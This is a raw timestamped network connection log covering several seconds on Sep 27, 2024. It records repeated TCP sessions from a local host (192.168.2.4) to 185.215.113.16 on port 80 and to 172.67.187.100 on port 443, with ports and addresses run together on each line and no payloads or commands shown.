                                                                                                                                                                Sep 27, 2024 17:42:05.884676933 CEST8049738185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.884809017 CEST4973880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:05.884915113 CEST8049740185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.885025024 CEST4974080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:05.885186911 CEST4974080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:05.890058041 CEST8049740185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.947041988 CEST44349739172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.947135925 CEST44349739172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.947376966 CEST49739443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:05.949007988 CEST49739443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:05.949007988 CEST49739443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:05.949023962 CEST44349739172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:05.949033976 CEST44349739172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.189908028 CEST49743443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:06.189975023 CEST44349743172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.190421104 CEST49743443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:06.210959911 CEST49743443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:06.210988045 CEST44349743172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.584541082 CEST8049740185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.585270882 CEST4974080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:06.586177111 CEST4974080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:06.590985060 CEST8049740185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.671725988 CEST44349743172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.671833992 CEST49743443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:06.673347950 CEST49743443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:06.673358917 CEST44349743172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.673600912 CEST44349743172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.677253008 CEST49743443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:06.719412088 CEST44349743172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.810822010 CEST8049740185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.812407017 CEST4974080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:06.926384926 CEST4974080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:06.926753044 CEST4974480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:06.931606054 CEST8049744185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.931714058 CEST4974480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:06.931754112 CEST8049740185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:06.931806087 CEST4974080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:06.931915045 CEST4974480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:06.936759949 CEST8049744185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:07.081496954 CEST44349743172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:07.081587076 CEST44349743172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:07.081625938 CEST49743443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:07.105959892 CEST49743443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:07.105998039 CEST44349743172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:07.727390051 CEST49745443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:07.727426052 CEST44349745172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:07.727494955 CEST49745443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:07.727813959 CEST49745443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:07.727827072 CEST44349745172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:07.959161997 CEST8049744185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:07.959292889 CEST4974480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:07.959450960 CEST8049744185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:07.959506035 CEST4974480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:07.960340977 CEST4974480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:07.965157986 CEST8049744185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:08.188471079 CEST8049744185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:08.188548088 CEST4974480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:08.301542044 CEST4974480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:08.302011013 CEST4974680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:08.306701899 CEST8049744185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:08.306752920 CEST4974480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:08.306952000 CEST8049746185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:08.307816029 CEST4974680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:08.307951927 CEST4974680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:08.312736034 CEST8049746185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:08.557631016 CEST49747443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:08.557676077 CEST44349747172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:08.557846069 CEST49747443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:08.558794975 CEST49747443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:08.558806896 CEST44349747172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:08.607711077 CEST44349745172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:08.607916117 CEST49745443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:08.612077951 CEST49745443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:08.612095118 CEST44349745172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:08.612329960 CEST44349745172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:08.615988970 CEST49745443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:08.663403988 CEST44349745172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.008563042 CEST44349745172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.008663893 CEST44349745172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.008848906 CEST49745443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:09.008948088 CEST49745443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:09.008965969 CEST44349745172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.008976936 CEST49745443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:09.008982897 CEST44349745172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.083329916 CEST8049746185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.083419085 CEST4974680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:09.084280968 CEST4974680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:09.089160919 CEST8049746185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.273073912 CEST49748443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:09.273176908 CEST44349748172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.273345947 CEST49748443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:09.273824930 CEST49748443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:09.273859978 CEST44349748172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.278522015 CEST44349747172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.278610945 CEST49747443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:09.279870033 CEST49747443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:09.279881001 CEST44349747172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.280615091 CEST44349747172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.331969023 CEST49747443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:09.336458921 CEST49747443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:09.383395910 CEST44349747172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.436841965 CEST8049746185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.437370062 CEST4974680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:09.551948071 CEST4974680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:09.552433014 CEST4974980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:09.557162046 CEST8049746185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.557219028 CEST8049749185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.557277918 CEST4974680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:09.557326078 CEST4974980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:09.557512045 CEST4974980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:09.562453032 CEST8049749185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.801073074 CEST44349747172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.801171064 CEST44349747172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.801282883 CEST49747443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:09.801671028 CEST49747443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:09.801688910 CEST44349747172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.801707983 CEST49747443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:09.801713943 CEST44349747172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.886650085 CEST44349748172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.886718988 CEST49748443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:09.887978077 CEST49748443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:09.887989044 CEST44349748172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.888216972 CEST44349748172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:09.888995886 CEST49748443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:09.931396961 CEST44349748172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:10.279664040 CEST8049749185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:10.279872894 CEST4974980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:10.280847073 CEST4974980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:10.285649061 CEST8049749185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:10.301048040 CEST44349748172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:10.301175117 CEST44349748172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:10.301229954 CEST49748443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:10.301434040 CEST49748443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:10.301456928 CEST44349748172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:10.301470041 CEST49748443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:10.301476955 CEST44349748172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:10.351502895 CEST49750443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:10.351547003 CEST44349750172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:10.351651907 CEST49750443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:10.351938963 CEST49750443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:10.351954937 CEST44349750172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:10.503495932 CEST8049749185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:10.503616095 CEST4974980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:10.570658922 CEST49751443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:10.570749044 CEST44349751172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:10.570888996 CEST49751443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:10.571336031 CEST49751443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:10.571372032 CEST44349751172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:10.613981962 CEST4974980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:10.614403009 CEST4975280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:10.619128942 CEST8049749185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:10.619209051 CEST8049752185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:10.619278908 CEST4974980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:10.619343042 CEST4975280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:10.619585037 CEST4975280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:10.624391079 CEST8049752185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.078628063 CEST44349750172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.078784943 CEST49750443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:11.079339027 CEST44349751172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.079457045 CEST49751443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:11.080375910 CEST49750443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:11.080383062 CEST44349750172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.080630064 CEST44349750172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.080696106 CEST49751443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:11.080725908 CEST44349751172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.080986977 CEST44349751172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.081482887 CEST49750443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:11.082269907 CEST49751443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:11.127398014 CEST44349750172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.127413034 CEST44349751172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.326113939 CEST8049752185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.327188015 CEST4975280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:11.327959061 CEST4975280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:11.332696915 CEST8049752185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.511985064 CEST44349750172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.512085915 CEST44349750172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.512238979 CEST49750443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:11.512315035 CEST49750443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:11.512334108 CEST44349750172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.512343884 CEST49750443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:11.512348890 CEST44349750172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.533917904 CEST44349751172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.534322977 CEST44349751172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.534408092 CEST49751443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:11.534616947 CEST49751443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:11.534668922 CEST44349751172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.534698009 CEST49751443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:11.534714937 CEST44349751172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.552459955 CEST8049752185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.552539110 CEST4975280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:11.663760900 CEST4975280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:11.664094925 CEST4975380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:11.668834925 CEST8049752185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.668909073 CEST4975280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:11.669300079 CEST8049753185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.669580936 CEST4975380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:11.669706106 CEST4975380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:11.674562931 CEST8049753185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.882395983 CEST49754443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:11.882430077 CEST44349754172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.882528067 CEST49754443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:11.882877111 CEST49754443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:11.882890940 CEST44349754172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.883433104 CEST49755443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:11.883455038 CEST44349755172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:11.883527040 CEST49755443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:11.883918047 CEST49755443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:11.883930922 CEST44349755172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.362951994 CEST44349754172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.363100052 CEST49754443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:12.364629984 CEST49754443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:12.364639997 CEST44349754172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.364877939 CEST44349754172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.365633965 CEST49754443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:12.371072054 CEST44349755172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.371164083 CEST49755443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:12.372452974 CEST49755443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:12.372462034 CEST44349755172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.373003006 CEST44349755172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.373943090 CEST49755443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:12.404237032 CEST8049753185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.405283928 CEST4975380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:12.408096075 CEST4975380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:12.411406040 CEST44349754172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.412925959 CEST8049753185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.419404984 CEST44349755172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.636272907 CEST8049753185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.636476040 CEST4975380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:12.739285946 CEST4975380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:12.739681005 CEST4975680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:12.745481014 CEST8049756185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.745692015 CEST4975680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:12.745692015 CEST4975680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:12.750518084 CEST8049756185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.754688978 CEST8049753185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.754761934 CEST4975380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:12.799081087 CEST44349754172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.799207926 CEST44349754172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.799408913 CEST49754443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:12.799500942 CEST49754443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:12.799515963 CEST44349754172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.799541950 CEST49754443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:12.799547911 CEST44349754172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.820492029 CEST44349755172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.820576906 CEST44349755172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.820708990 CEST49755443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:12.820800066 CEST49755443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:12.820813894 CEST44349755172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:12.820827961 CEST49755443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:12.820832968 CEST44349755172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.133387089 CEST49757443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.133430004 CEST44349757172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.133497000 CEST49757443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.133933067 CEST49757443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.133946896 CEST44349757172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.136122942 CEST49758443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.136131048 CEST44349758172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.136198044 CEST49758443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.136550903 CEST49758443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.136559963 CEST44349758172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.506381989 CEST8049756185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.506432056 CEST4975680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:13.507097960 CEST4975680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:13.511959076 CEST8049756185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.630501032 CEST44349757172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.630631924 CEST49757443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.632049084 CEST49757443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.632061005 CEST44349757172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.632306099 CEST44349757172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.633497000 CEST49757443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.639627934 CEST44349758172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.639729977 CEST49758443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.640834093 CEST49758443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.640841007 CEST44349758172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.641195059 CEST44349758172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.641973972 CEST49758443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:13.675453901 CEST44349757172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.687449932 CEST44349758172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.733561039 CEST8049756185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.733632088 CEST4975680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:13.848297119 CEST4975680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:13.848690033 CEST4975980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:13.853568077 CEST8049759185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.853636026 CEST8049756185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:13.853701115 CEST4975980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:13.853754997 CEST4975680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:13.853938103 CEST4975980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:13.858800888 CEST8049759185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.208919048 CEST44349757172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.208983898 CEST44349758172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.209008932 CEST44349757172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.209074020 CEST49757443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:14.209081888 CEST44349758172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:14.209151983 CEST49758443192.168.2.4172.67.187.100
